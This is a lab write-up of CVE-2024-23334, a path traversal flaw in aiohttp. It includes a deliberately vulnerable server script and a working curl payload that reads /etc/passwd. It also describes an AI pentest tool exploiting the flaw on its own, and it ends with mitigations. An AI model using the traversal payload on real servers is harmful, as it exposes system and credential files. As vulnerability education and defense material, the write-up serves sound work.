Understanding the Vulnerability
CVE-2024-23334, a critical vulnerability discovered in aiohttp, a popular asynchronous HTTP client/server framework for Python, exposes systems to potential directory traversal attacks. This vulnerability arises when aiohttp is used as a web server and static routes are configured without proper safeguards.
Directory traversal is a type of attack where an attacker attempts to access files or directories outside of the intended scope. In the context of aiohttp, this vulnerability allows an attacker to navigate beyond the configured static directory and potentially access sensitive files or even execute arbitrary code.
Root Cause and Impact
The root cause of this vulnerability lies in the way aiohttp handles static file serving when follow_symlinks is enabled. This setting allows aiohttp to follow symbolic links (symlinks) during file serving, which can be exploited by attackers to navigate to arbitrary locations on the system.
If an attacker can construct a malicious URL that leverages symlinks, they can potentially access files or directories that are normally restricted. This could lead to a range of consequences, including:
Data exfiltration: Sensitive data stored on the system, such as credentials, configuration files, or proprietary information, could be exposed.
Remote code execution: If the attacker can access executable files, they may be able to execute arbitrary code on the system, potentially gaining full control.
Denial of service: By consuming system resources or triggering errors, the attacker could disrupt the normal operation of the application or server.
Proof of Concept
Building a lab environment for CVE-2024-23334 is simple. We just need to install the vulnerable version of aiohttp and host a server that include static routes with follow_symlinks attribute set to True. We can use the python package manager to simply install it:
pip install aiohttp==3.9.1Now the below mentioned simple python script is all we need to run to set up the aiohttp vulnerable server:
from aiohttp import web
import asyncio
async def index(request):
return web.Response(text="CVE-2024-23334 Exploit")
async def main():
app = web.Application()
app.router.add_get('/', index)
app.router.add_static('/static/',
path='static/',
follow_symlinks=True)
runner = web.AppRunner(app)
await runner.setup()
site = web.TCPSite(runner, 'localhost', 8081)
await site.start()
print("Server started on http://localhost:8081")
if __name__ == '__main__':
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
loop.run_forever()
python server_file.pyThis will get our aiohttp server up and running on port 8081 of localhost.
So now we have our target ready. It's time to perform the directory traversal attack to read files on the host server by exploiting CVE-2024-23334. This does not require any fancy exploitation, we will simply send a CURL request on server's /static endpoint with out malicious payload. The CURL would look like this if we would like to read the /etc/passwd file:
curl -s --path-as-is "http://localhost:8081/static/../../../../../etc/passwd"
Proof of Concept using HackerGPT
HackerGPT is an AI-powered Penetration Tester developed by White Hack Lab. It's an autonomous tool that we utilize to identify and exploit vulnerabilities in applications using a combination of generative AI methodologies.
Let's start with asking HackerGPT to perform a pentest on our target, that is http://localhost:8081
Just with that simple instruction, it was able to actually exploit this CVE-2024-23334 on our target and created the following report in markdown:
HackerGPT: Based on the analysis, the target web application running on http://localhost:8081 is vulnerable to a path traversal attack. This vulnerability is outlined in CVE-2024-23334, which affects aiohttp servers configured with `follow_symlinks` enabled.
### Exploit Details
#### Example Exploit with CURL
```shell
curl -s --path-as-is "http://localhost:8081/static/../../../../../etc/passwd"
```
This CURL command allows an attacker to read the `/etc/passwd` file by exploiting the directory traversal vulnerability.
### Mitigation
To mitigate this vulnerability, the following steps should be taken:
1. **Disable `follow_symlinks`:** Ensure that `follow_symlinks` is set to `False`.
2. **Sanitize and validate URLs:** Implement robust sanitization and validation of user inputs
to prevent malicious URL constructions.
Here is the corrected, safer configuration:
```python
app.router.add_static('/static/', path='/path/to/static/files', follow_symlinks=False)
```
### Summary
The target web application is vulnerable to a path traversal attack due to improper
configuration of the aiohttp server. Immediate remediation steps should be taken to secure
the server by modifying the configuration and ensuring robust input validation.Mitigation Strategies
To mitigate the risks posed by CVE-2024-23334, it is essential to implement the following strategies:
Upgrade to aiohttp 3.9.2 or later: This version of aiohttp includes a fix for the vulnerability.
Disable follow_symlinks: By disabling this setting, aiohttp will no longer follow symlinks during file serving, preventing attackers from exploiting the vulnerability.
Use a reverse proxy: A reverse proxy can be configured to handle static file requests, reducing the attack surface of the aiohttp application. This can be particularly effective in environments where multiple applications share the same web server.
Additional Considerations
Regular security audits: Conduct regular security audits to identify and address potential vulnerabilities, including those that may not be publicly known.
Input validation: Implement strict input validation to prevent malicious input from being processed by the application.
Least privilege principle: Ensure that applications and services run with the minimum necessary privileges to reduce the potential impact of a successful attack.
By following these guidelines, organizations can significantly reduce the risk of exploitation and protect their systems from the vulnerabilities associated with CVE-2024-23334.
